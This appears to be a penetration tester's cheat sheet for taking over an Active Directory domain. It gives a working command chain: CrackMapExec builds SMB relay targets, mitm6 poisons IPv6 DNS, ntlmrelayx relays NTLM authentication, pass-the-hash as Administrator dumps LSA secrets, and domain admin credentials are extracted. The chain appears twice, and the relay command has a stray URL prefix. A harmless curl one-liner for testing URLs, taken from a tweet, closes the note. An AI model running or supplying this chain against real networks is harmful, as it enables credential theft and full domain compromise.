#EASY
cme smb $hosts --gen-relay-list relay.txt
mitm6 -i eth0 -d $domain
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
extract "Admin" hash
cme smb $hosts -u Administrator -H $hash -d LOCALHOST --lsa
cp /root/.cme/logs/*.secrets |sort -u
extract DA cred
cme smb $hosts --gen-relay-list relay.txt
mitm6 -i eth0 -d $domain
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
extract "Admin" hash
cme smb $hosts -u Administrator -H $hash -d LOCALHOST --lsa
cp /root/.cme/logs/*.secrets |sort -u
extract DA cred
https://twitter.com/gwendallecoguic/status/1195349913070116865?s=20
https://twitter.com/gwendallecoguic/status/1195353878092566530?s=20
https://twitter.com/gwendallecoguic/status/1195353878092566530?s=20
Twitter
Gwendal Le Coguic
onliner to quickly test some urls with curl: cat plainurls.txt | while read u;do echo "$(printf '%-100s' "$u")-> $((curl -I -s -m 5 -k "$u"||echo KO)|head -n 1 -)"; done https://t.co/Rou0D3kU60